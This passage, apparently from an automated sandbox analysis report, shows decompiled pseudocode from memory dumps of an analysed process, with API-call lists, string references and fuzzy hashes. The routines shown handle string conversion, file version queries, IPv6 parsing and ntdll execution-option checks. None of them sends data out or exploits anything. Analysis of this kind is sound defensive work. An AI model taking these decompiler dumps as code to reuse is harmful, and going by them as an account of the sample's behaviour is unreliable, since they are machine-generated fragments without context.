                                                        						__imp__#2(L"null");
                                                        						_v32 = 1;
                                                        						if(_t57 != 0) {
                                                        							L6:
                                                        							_t77 = E00B81D50( &_v24, _v32);
                                                        							if(_t77 < 0) {
                                                        								goto L11;
                                                        							}
                                                        							if(_v8 != _t65 - 1) {
                                                        								_v12 = 0x20;
                                                        								_t61 = E00B81954( &_v24,  &_v12, 1);
                                                        								_t77 = _t61;
                                                        								if(_t77 >= 0) {
                                                        									goto L8;
                                                        								}
                                                        								goto L11;
                                                        							}
                                                        							L8:
                                                        							_v8 = _v8 + 1;
                                                        							if(_v8 < _t65) {
                                                        								continue;
                                                        							}
                                                        							goto L9;
                                                        						}
                                                        						_t77 = 0x8007000e;
                                                        						goto L11;
                                                        					}
                                                        					_t63 =  &_v40;
                                                        					__imp__#12(_t63,  &_v56, 0);
                                                        					_t77 = _t63;
                                                        					if(_t77 < 0) {
                                                        						goto L11;
                                                        					}
                                                        					goto L6;
                                                        				}
                                                        				goto L11;
                                                        			}


                                                        APIs
                                                          • Part of subcall function 00B818C4: GetProcessHeap.KERNEL32(00000000,?), ref: 00B818E8
                                                          • Part of subcall function 00B818C4: HeapAlloc.KERNEL32(00000000), ref: 00B818EB
                                                        • VariantClear.OLEAUT32(?), ref: 00B81CA7
                                                        • VariantClear.OLEAUT32(?), ref: 00B81CAD
                                                        • SafeArrayGetElement.OLEAUT32(?,00000000,?), ref: 00B81CBA
                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 00B81CDF
                                                          • Part of subcall function 00B81D50: lstrlenW.KERNEL32(?,00000000,?,00B81CF6,?), ref: 00B81D5B
                                                        • VariantClear.OLEAUT32(?), ref: 00B81D2A
                                                        • VariantClear.OLEAUT32(?), ref: 00B81D30
                                                        • SysAllocString.OLEAUT32(null), ref: 00B8903B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: Variant$Clear$AllocHeap$ArrayChangeElementProcessSafeStringTypelstrlen
                                                        • String ID: $null
                                                        • API String ID: 101175001-2258636290
                                                        • Opcode ID: b3418533d5a0cb06194519d5669c9d9f73eb179364b1f552def487414f01f6a5
                                                        • Instruction ID: 281cb370feca20f68cfe52c29afa5900ec411ccc6ae1ca056009e3a7c75ae1b1
                                                        • Opcode Fuzzy Hash: b3418533d5a0cb06194519d5669c9d9f73eb179364b1f552def487414f01f6a5
                                                        • Instruction Fuzzy Hash: 60311276D0221AABCB11EBA8D545AEEB3FCEF04751F1105A5ED11F7160EA30DE05CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 55%
                                                        			E00B857A1(void* __ecx, int _a4, void* _a8, unsigned int _a12, short** _a16) {
                                                        				int _v8;
                                                        				short* _t51;
                                                        				signed char _t55;
                                                        				signed int _t56;
                                                        				void* _t60;
                                                        				short _t61;
                                                        				signed int _t64;
                                                        				intOrPtr* _t67;
                                                        				int _t74;
                                                        				void* _t75;
                                                        				intOrPtr _t77;
                                                        				short* _t79;
                                                        				short** _t82;
                                                        				signed int _t83;
                                                        				int _t85;
                                                        				short* _t86;
                                                        
                                                        				_t82 = _a16;
                                                        				 *_t82 =  *_t82 & 0x00000000;
                                                        				if(_a12 == 0) {
                                                        					__imp__#2(0xb89acc);
                                                        					_t79 = _t51;
                                                        					if(_t79 == 0) {
                                                        						L18:
                                                        						_t83 = 0x8007000e;
                                                        						L10:
                                                        						if(_t79 != 0) {
                                                        							__imp__#6(_t79);
                                                        						}
                                                        						goto L11;
                                                        					} else {
                                                        						 *_t79 = 0;
                                                        						 *_t82 = _t79;
                                                        						_t83 = 0;
                                                        						L11:
                                                        						return _t83;
                                                        					}
                                                        				}
                                                        				_t74 = 1;
                                                        				if((_a12 & 1) != 0) {
                                                        					L4:
                                                        					_t74 = 0;
                                                        					_t55 = MultiByteToWideChar(_a4, 0, _a8, _a12, 0, 0);
                                                        					_t85 = _t55;
                                                        					if(_t85 == 0) {
                                                        						_t56 = GetLastError();
                                                        						if(_t56 > 0) {
                                                        							_t56 = _t56 & 0x0000ffff | 0x80070000;
                                                        						}
                                                        						_t83 = _t56;
                                                        						goto L11;
                                                        					}
                                                        					L5:
                                                        					__imp__#4(0, _t85);
                                                        					_t79 = _t55;
                                                        					if(_t79 == 0) {
                                                        						goto L18;
                                                        					}
                                                        					if(_t74 != 0) {
                                                        						_t75 = _t85 + _t85;
                                                        						_push(_t75);
                                                        						if(_t74 != 2) {
                                                        							memmove(_t79, _a8, ??);
                                                        						} else {
                                                        							_push(_t79);
                                                        							_push(_a8);
                                                        							L00B93ED2();
                                                        						}
                                                        						 *((short*)(_t75 + _t79)) = 0;
                                                        						if(_t85 != 0) {
                                                        							L8:
                                                        							_t20 = _t85 * 2; // -2
                                                        							_t86 = _t79 + _t20 - 2;
                                                        							_t60 = 0x1a;
                                                        							if(_t60 ==  *_t86) {
                                                        								_t61 = 0xa;
                                                        								 *_t86 = _t61;
                                                        							}
                                                        							goto L9;
                                                        						} else {
                                                        							L9:
                                                        							 *_a16 = _t79;
                                                        							_t79 = 0;
                                                        							_t83 = 0;
                                                        							goto L10;
                                                        						}
                                                        					}
                                                        					_t85 = MultiByteToWideChar(_a4, _t74, _a8, _a12, _t79, _t85);
                                                        					if(_t85 == 0) {
                                                        						_t64 = GetLastError();
                                                        						if(_t64 > 0) {
                                                        							_t64 = _t64 & 0x0000ffff | 0x80070000;
                                                        						}
                                                        						_t83 = _t64;
                                                        						goto L10;
                                                        					}
                                                        					goto L8;
                                                        				}
                                                        				if(E00B8587A() == 0) {
                                                        					_t67 = _a8;
                                                        					_t77 =  *_t67;
                                                        					if(_t77 != 0xfe ||  *((char*)(_t67 + 1)) != 0xff) {
                                                        						if(_t77 != 0xff ||  *((char*)(_t67 + 1)) != 0xfe) {
                                                        							goto L4;
                                                        						} else {
                                                        							_t55 = _t67 + 2;
                                                        							_a8 = _t55;
                                                        							L16:
                                                        							_a12 = _a12 - 2;
                                                        							goto L17;
                                                        						}
                                                        					} else {
                                                        						_t74 = 2;
                                                        						_t55 = _t67 + 1;
                                                        						_a8 = _t55;
                                                        						L21:
                                                        						_a12 = _a12 - _t74;
                                                        						L17:
                                                        						_t85 = _a12 >> 1;
                                                        						goto L5;
                                                        					}
                                                        				}
                                                        				_v8 = 0x1ee;
                                                        				IsTextUnicode(_a8, _a12,  &_v8);
                                                        				_t55 = _v8;
                                                        				if((_t55 & 0x00000100) == 0) {
                                                        					if((_t55 & 0x00000008) == 0) {
                                                        						if(_t55 >= 0) {
                                                        							if((_t55 & 0x00000004) != 0) {
                                                        								goto L17;
                                                        							}
                                                        							if((_t55 & 0x00000040) == 0) {
                                                        								if((_t55 & 0x00000002) != 0) {
                                                        									goto L17;
                                                        								}
                                                        								if((_t55 & 0x00000020) == 0) {
                                                        									goto L4;
                                                        								}
                                                        							}
                                                        							_t74 = 2;
                                                        							goto L17;
                                                        						}
                                                        						_t74 = 2;
                                                        						_a8 = _a8 + 1;
                                                        						goto L21;
                                                        					}
                                                        					_a8 = _a8 + 2;
                                                        					goto L16;
                                                        				}
                                                        				goto L4;
                                                        			}




















                                                        APIs
                                                        • IsTextUnicode.ADVAPI32(?,00000000,?), ref: 00B857E0
                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00B904FD,?,?), ref: 00B85804
                                                        • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00B85817
                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,00B904FD,?,?), ref: 00B8583B
                                                          • Part of subcall function 00B8587A: GetVersionExA.KERNEL32(?), ref: 00B858A0
                                                        • SysAllocString.OLEAUT32(00B89ACC), ref: 00B88603
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: AllocByteCharMultiStringWide$TextUnicodeVersion
                                                        • String ID:
                                                        • API String ID: 2550708280-0
                                                        • Opcode ID: 1eab6747fe77e1e471651c64e6aa99fb180b5f4d03dda5908d57ced2adf3f227
                                                        • Instruction ID: 2f4a7a8dcdfc7725224c9fc9b371e47259378da50d39640fba48a5099d191eaa
                                                        • Opcode Fuzzy Hash: 1eab6747fe77e1e471651c64e6aa99fb180b5f4d03dda5908d57ced2adf3f227
                                                        • Instruction Fuzzy Hash: BC51DF76500607EFDB316F288C88BBA3BE4EF04364F6485A5ED55AB1B0EB308D01DB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 64%
                                                        			E02307EFD(void* __ecx, intOrPtr _a4) {
                                                        				signed int _v8;
                                                        				char _v540;
                                                        				unsigned int _v544;
                                                        				signed int _v548;
                                                        				intOrPtr _v552;
                                                        				char _v556;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t33;
                                                        				void* _t38;
                                                        				unsigned int _t46;
                                                        				unsigned int _t47;
                                                        				unsigned int _t52;
                                                        				intOrPtr _t56;
                                                        				unsigned int _t62;
                                                        				void* _t69;
                                                        				void* _t70;
                                                        				intOrPtr _t72;
                                                        				signed int _t73;
                                                        				void* _t74;
                                                        				void* _t75;
                                                        				void* _t76;
                                                        				void* _t77;
                                                        
                                                        				_t33 =  *0x23b2088; // 0x77da46ae
                                                        				_v8 = _t33 ^ _t73;
                                                        				_v548 = _v548 & 0x00000000;
                                                        				_t72 = _a4;
                                                        				if(E02307F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                        					__eflags = _v548;
                                                        					if(_v548 == 0) {
                                                        						goto L1;
                                                        					}
                                                        					_t62 = _t72 + 0x24;
                                                        					E02323F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                        					_t71 = 0x214;
                                                        					_v544 = 0x214;
                                                        					E022DDFC0( &_v540, 0, 0x214);
                                                        					_t75 = _t74 + 0x20;
                                                        					_t46 =  *0x23b4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                        					__eflags = _t46;
                                                        					if(_t46 == 0) {
                                                        						goto L1;
                                                        					}
                                                        					_t47 = _v544;
                                                        					__eflags = _t47;
                                                        					if(_t47 == 0) {
                                                        						goto L1;
                                                        					}
                                                        					__eflags = _t47 - 0x214;
                                                        					if(_t47 >= 0x214) {
                                                        						goto L1;
                                                        					}
                                                        					_push(_t62);
                                                        					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                        					E02323F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                        					_t52 = E022E0D27( &_v540, L"Execute=1");
                                                        					_t76 = _t75 + 0x1c;
                                                        					_push(_t62);
                                                        					__eflags = _t52;
                                                        					if(_t52 == 0) {
                                                        						E02323F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                        						_t71 =  &_v540;
                                                        						_t56 = _t73 + _v544 - 0x218;
                                                        						_t77 = _t76 + 0x14;
                                                        						_v552 = _t56;
                                                        						__eflags = _t71 - _t56;
                                                        						if(_t71 >= _t56) {
                                                        							goto L1;
                                                        						} else {
                                                        							goto L10;
                                                        						}
                                                        						while(1) {
                                                        							L10:
                                                        							_t62 = E022E8375(_t71, 0x20);
                                                        							_pop(_t69);
                                                        							__eflags = _t62;
                                                        							if(__eflags != 0) {
                                                        								__eflags = 0;
                                                        								 *_t62 = 0;
                                                        							}
                                                        							E02323F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                        							_t77 = _t77 + 0x10;
                                                        							E0234E8DB(_t69, _t70, __eflags, _t72, _t71);
                                                        							__eflags = _t62;
                                                        							if(_t62 == 0) {
                                                        								goto L1;
                                                        							}
                                                        							_t31 = _t62 + 2; // 0x2
                                                        							_t71 = _t31;
                                                        							__eflags = _t71 - _v552;
                                                        							if(_t71 >= _v552) {
                                                        								goto L1;
                                                        							}
                                                        						}
                                                        					}
                                                        					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                        					_push(3);
                                                        					_push(0x55);
                                                        					E02323F92();
                                                        					_t38 = 1;
                                                        					L2:
                                                        					return E022DE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                        				}
                                                        				L1:
                                                        				_t38 = 0;
                                                        				goto L2;
                                                        			}



























                                                        0x0232e368
                                                        0x0232e36e
                                                        0x00000000
                                                        0x00000000
                                                        0x0232e374
                                                        0x0232e32f
                                                        0x02323f75
                                                        0x02323f7a
                                                        0x02323f7c
                                                        0x02323f7e
                                                        0x02323f86
                                                        0x02307f39
                                                        0x02307f47
                                                        0x02307f47
                                                        0x02307f37
                                                        0x02307f37
                                                        0x00000000

                                                        APIs
                                                        • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02323F12
                                                        Strings
                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0232E2FB
                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02323EC4
                                                        • Execute=1, xrefs: 02323F5E
                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02323F75
                                                        • ExecuteOptions, xrefs: 02323F04
                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 0232E345
                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02323F4A
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: BaseDataModuleQuery
                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                        • API String ID: 3901378454-484625025
                                                        • Opcode ID: 0f4b7fd3a57a3ac08e6ec3191df8261c22ec90179da06c04801370640951b24d
                                                        • Instruction ID: 4ab13e233642e2f70be3640cb1c5b6b9224d7e4d97dfbc5faed9426d2cc620ba
                                                        • Opcode Fuzzy Hash: 0f4b7fd3a57a3ac08e6ec3191df8261c22ec90179da06c04801370640951b24d
                                                        • Instruction Fuzzy Hash: 6141887269031CBAEF20EA94DCD5FDAB3BDAB54704F0005A9E505E6081EB70EA458F65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00B8493D
                                                        • SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 00B84998
                                                        • SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 00B849AD
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ArrayCreateSafe$??2@
                                                        • String ID:
                                                        • API String ID: 2937607175-0
                                                        • Opcode ID: 2ff5a1f56425503b91ac8d4dd58750494aae519bdfbdca017cb05aa96333d852
                                                        • Instruction ID: 01765b7f84ad8ed344a2e6cfa9066f07290afec4959227c907fdacc7c155d3cd
                                                        • Opcode Fuzzy Hash: 2ff5a1f56425503b91ac8d4dd58750494aae519bdfbdca017cb05aa96333d852
                                                        • Instruction Fuzzy Hash: 7751933594420ADFDB20EFA8C884ABEB7F5FF48714F244496E915EB260DB70DA41DB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 84%
                                                        			E00B8442A(short* _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                                        				signed int _v8;
                                                        				char* _v12;
                                                        				int _v16;
                                                        				void* _v20;
                                                        				int _v24;
                                                        				void* _v36;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t27;
                                                        				signed int _t32;
                                                        				int _t43;
                                                        				void* _t44;
                                                        				int _t59;
                                                        				void* _t60;
                                                        				void* _t61;
                                                        				void* _t62;
                                                        				void* _t65;
                                                        				int _t66;
                                                        				int _t67;
                                                        				signed int _t68;
                                                        				void* _t69;
                                                        				intOrPtr _t71;
                                                        
                                                        				_t27 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t27 ^ _t68;
                                                        				 *_a8 = 0;
                                                        				 *_a12 = 0;
                                                        				_t71 =  *0xb97001; // 0x0
                                                        				if(_t71 == 0) {
                                                        					_t59 = WideCharToMultiByte(0, 0, _a4, 0xffffffff, 0, 0, 0, 0);
                                                        					if(_t59 == 0) {
                                                        						L7:
                                                        						_t32 = GetLastError();
                                                        						if(_t32 > 0) {
                                                        							_t32 = _t32 & 0x0000ffff | 0x80070000;
                                                        						}
                                                        						L6:
                                                        						_pop(_t60);
                                                        						_pop(_t65);
                                                        						return E00B81335(_t32, 0, _v8 ^ _t68, _t57, _t60, _t65);
                                                        					}
                                                        					E00B8320B(_t31);
                                                        					_v12 = _t69;
                                                        					if(_t69 != 0) {
                                                        						if(WideCharToMultiByte(0, 0, _a4, 0xffffffff, _v12, _t59, 0, 0) == 0) {
                                                        							goto L7;
                                                        						}
                                                        						_t66 = GetFileVersionInfoSizeA(_v12,  &_v16);
                                                        						if(_t66 == 0) {
                                                        							goto L7;
                                                        						}
                                                        						E00B8320B(_t38);
                                                        						_t61 = _t69;
                                                        						if(GetFileVersionInfoA(_v12, _v16, _t66, _t61) == 0) {
                                                        							goto L7;
                                                        						}
                                                        						_t43 = VerQueryValueA(_t61, E00B855B8,  &_v20,  &_v24);
                                                        						L4:
                                                        						if(_t43 == 0) {
                                                        							goto L7;
                                                        						}
                                                        						_t44 = _v20;
                                                        						_t11 = _t44 + 0x10; // 0x840f0c5d
                                                        						_t57 = _a8;
                                                        						 *_a8 =  *_t11;
                                                        						_t13 = _t44 + 0x14; // 0x5c83
                                                        						 *_a12 =  *_t13;
                                                        						_t32 = 0;
                                                        						goto L6;
                                                        					}
                                                        					_t32 = 0x8007000e;
                                                        					goto L6;
                                                        				}
                                                        				_t67 = GetFileVersionInfoSizeW(_a4,  &_v16);
                                                        				if(_t67 == 0) {
                                                        					goto L7;
                                                        				}
                                                        				E00B8320B(_t47);
                                                        				_t62 = _t69;
                                                        				if(GetFileVersionInfoW(_a4, _v16, _t67, _t62) == 0) {
                                                        					goto L7;
                                                        				}
                                                        				_t43 = VerQueryValueW(_t62, E00B844CC,  &_v20,  &_v24);
                                                        				goto L4;
                                                        			}


                                                        APIs
                                                        • GetFileVersionInfoSizeW.VERSION(00B82218,00B82238,00B82238,00B8220C,00000000,?,00B8234C,00B82238,00B82218,00B8221C), ref: 00B8445E
                                                        • GetFileVersionInfoW.VERSION(00B82218,00B82238,00000000,?,00B82218,00B82238,00B82238,00B8220C,00000000,?,00B8234C,00B82238,00B82218,00B8221C), ref: 00B84478
                                                        • VerQueryValueW.VERSION(?,00B844CC,00B8234C,?,00B82218,00B82238,00000000,?,00B82218,00B82238,00B82238,00B8220C,00000000,?,00B8234C,00B82238), ref: 00B8448F
                                                        • GetLastError.KERNEL32(?,00B8234C,00B82238,00B82218,00B8221C), ref: 00B844C1
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00B82218,000000FF,00000000,00000000,00000000,00000000,00B82238,00B8220C,00000000,?,00B8234C,00B82238,00B82218,00B8221C), ref: 00B87EC2
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: FileInfoVersion$ByteCharErrorLastMultiQuerySizeValueWide
                                                        • String ID:
                                                        • API String ID: 3366682162-0
                                                        • Opcode ID: ca6ef5937b3099fbdbe3865a7709cb4b0a3bbccd4a06e22b66e586f1076cf17d
                                                        • Instruction ID: 4c56909052b94b4a6e9053a0014f8146b2228bcd88f13e43521dcc9cfdaed329
                                                        • Opcode Fuzzy Hash: ca6ef5937b3099fbdbe3865a7709cb4b0a3bbccd4a06e22b66e586f1076cf17d
                                                        • Instruction Fuzzy Hash: 493159B250011AAF8B11FFA4CC80EAF7BEDEF49754B1841A5F91597261DB31CE14CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E02310B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                        				signed int _v8;
                                                        				signed int _v12;
                                                        				signed int _v16;
                                                        				signed int _v20;
                                                        				signed int _v24;
                                                        				signed int _v28;
                                                        				signed int _v32;
                                                        				void* _t108;
                                                        				void* _t116;
                                                        				char _t120;
                                                        				short _t121;
                                                        				void* _t128;
                                                        				intOrPtr* _t130;
                                                        				char _t132;
                                                        				short _t133;
                                                        				intOrPtr _t141;
                                                        				signed int _t156;
                                                        				signed int _t174;
                                                        				intOrPtr _t177;
                                                        				intOrPtr* _t179;
                                                        				intOrPtr _t180;
                                                        				void* _t183;
                                                        
                                                        				_t179 = _a4;
                                                        				_t141 =  *_t179;
                                                        				_v16 = 0;
                                                        				_v28 = 0;
                                                        				_v8 = 0;
                                                        				_v24 = 0;
                                                        				_v12 = 0;
                                                        				_v32 = 0;
                                                        				_v20 = 0;
                                                        				if(_t141 == 0) {
                                                        					L41:
                                                        					 *_a8 = _t179;
                                                        					_t180 = _v24;
                                                        					if(_t180 != 0) {
                                                        						if(_t180 != 3) {
                                                        							goto L6;
                                                        						}
                                                        						_v8 = _v8 + 1;
                                                        					}
                                                        					_t174 = _v32;
                                                        					if(_t174 == 0) {
                                                        						if(_v8 == 7) {
                                                        							goto L43;
                                                        						}
                                                        						goto L6;
                                                        					}
                                                        					L43:
                                                        					if(_v16 != 1) {
                                                        						if(_v16 != 2) {
                                                        							goto L6;
                                                        						}
                                                        						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                        						L47:
                                                        						if(_t174 != 0) {
                                                        							E022E8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                        							_t116 = 8;
                                                        							E022DDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                        						}
                                                        						return 0;
                                                        					}
                                                        					if(_t180 != 0) {
                                                        						if(_v12 > 3) {
                                                        							goto L6;
                                                        						}
                                                        						_t120 = E02310CFA(_v28, 0, 0xa);
                                                        						_t183 = _t183 + 0xc;
                                                        						if(_t120 > 0xff) {
                                                        							goto L6;
                                                        						}
                                                        						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                        						goto L47;
                                                        					}
                                                        					if(_v12 > 4) {
                                                        						goto L6;
                                                        					}
                                                        					_t121 = E02310CFA(_v28, _t180, 0x10);
                                                        					_t183 = _t183 + 0xc;
                                                        					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                        					goto L47;
                                                        				} else {
                                                        					while(1) {
                                                        						_t123 = _v16;
                                                        						if(_t123 == 0) {
                                                        							goto L7;
                                                        						}
                                                        						_t108 = _t123 - 1;
                                                        						if(_t108 != 0) {
                                                        							goto L1;
                                                        						}
                                                        						_t178 = _t141;
                                                        						if(E023106BA(_t108, _t141) == 0 || _t135 == 0) {
                                                        							if(E023106BA(_t135, _t178) == 0 || E02310A5B(_t136, _t178) == 0) {
                                                        								if(_t141 != 0x3a) {
                                                        									if(_t141 == 0x2e) {
                                                        										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                        											goto L41;
                                                        										} else {
                                                        											_v24 = _v24 + 1;
                                                        											L27:
                                                        											_v16 = _v16 & 0x00000000;
                                                        											L28:
                                                        											if(_v28 == 0) {
                                                        												goto L20;
                                                        											}
                                                        											_t177 = _v24;
                                                        											if(_t177 != 0) {
                                                        												if(_v12 > 3) {
                                                        													L6:
                                                        													return 0xc000000d;
                                                        												}
                                                        												_t132 = E02310CFA(_v28, 0, 0xa);
                                                        												_t183 = _t183 + 0xc;
                                                        												if(_t132 > 0xff) {
                                                        													goto L6;
                                                        												}
                                                        												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                        												goto L20;
                                                        											}
                                                        											if(_v12 > 4) {
                                                        												goto L6;
                                                        											}
                                                        											_t133 = E02310CFA(_v28, 0, 0x10);
                                                        											_t183 = _t183 + 0xc;
                                                        											_v20 = _v20 + 1;
                                                        											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                        											goto L20;
                                                        										}
                                                        									}
                                                        									goto L41;
                                                        								}
                                                        								if(_v24 > 0 || _v8 > 6) {
                                                        									goto L41;
                                                        								} else {
                                                        									_t130 = _t179 + 1;
                                                        									if( *_t130 == _t141) {
                                                        										if(_v32 != 0) {
                                                        											goto L41;
                                                        										}
                                                        										_v32 = _v8 + 1;
                                                        										_t156 = 2;
                                                        										_v8 = _v8 + _t156;
                                                        										L34:
                                                        										_t179 = _t130;
                                                        										_v16 = _t156;
                                                        										goto L28;
                                                        									}
                                                        									_v8 = _v8 + 1;
                                                        									goto L27;
                                                        								}
                                                        							} else {
                                                        								_v12 = _v12 + 1;
                                                        								if(_v24 > 0) {
                                                        									goto L41;
                                                        								}
                                                        								_a7 = 1;
                                                        								goto L20;
                                                        							}
                                                        						} else {
                                                        							_v12 = _v12 + 1;
                                                        							L20:
                                                        							_t179 = _t179 + 1;
                                                        							_t141 =  *_t179;
                                                        							if(_t141 == 0) {
                                                        								goto L41;
                                                        							}
                                                        							continue;
                                                        						}
                                                        						L7:
                                                        						if(_t141 == 0x3a) {
                                                        							if(_v24 > 0 || _v8 > 0) {
                                                        								goto L41;
                                                        							} else {
                                                        								_t130 = _t179 + 1;
                                                        								if( *_t130 != _t141) {
                                                        									goto L41;
                                                        								}
                                                        								_v20 = _v20 + 1;
                                                        								_t156 = 2;
                                                        								_v32 = 1;
                                                        								_v8 = _t156;
                                                        								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                        								goto L34;
                                                        							}
                                                        						}
                                                        						L8:
                                                        						if(_v8 > 7) {
                                                        							goto L41;
                                                        						}
                                                        						_t142 = _t141;
                                                        						if(E023106BA(_t123, _t141) == 0 || _t124 == 0) {
                                                        							if(E023106BA(_t124, _t142) == 0 || E02310A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                        								goto L41;
                                                        							} else {
                                                        								_t128 = 1;
                                                        								_a7 = 1;
                                                        								_v28 = _t179;
                                                        								_v16 = 1;
                                                        								_v12 = 1;
                                                        								L39:
                                                        								if(_v16 == _t128) {
                                                        									goto L20;
                                                        								}
                                                        								goto L28;
                                                        							}
                                                        						} else {
                                                        							_a7 = 0;
                                                        							_v28 = _t179;
                                                        							_v16 = 1;
                                                        							_v12 = 1;
                                                        							goto L20;
                                                        						}
                                                        					}
                                                        				}
                                                        				L1:
                                                        				_t123 = _t108 == 1;
                                                        				if(_t108 == 1) {
                                                        					goto L8;
                                                        				}
                                                        				_t128 = 1;
                                                        				goto L39;
                                                        			}


























                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: __fassign
                                                        • String ID: .$:$:
                                                        • API String ID: 3965848254-2308638275
                                                        • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                        • Instruction ID: bf0d8547dc4102d9d5fdcb15a7e330a9acb3ef05d404a06105837c29714b219a
                                                        • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                        • Instruction Fuzzy Hash: 3DA17A7190420AEECF2CCF68C8557BEB7B9AF05309F24846ADC52AB281DB3496C5CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 95%
                                                        			E00B832BE(void* __edx, void* _a4, short* _a8, char* _a12) {
                                                        				signed int _v8;
                                                        				char _v1032;
                                                        				char _v3080;
                                                        				int _v3084;
                                                        				int _v3088;
                                                        				int* _v3092;
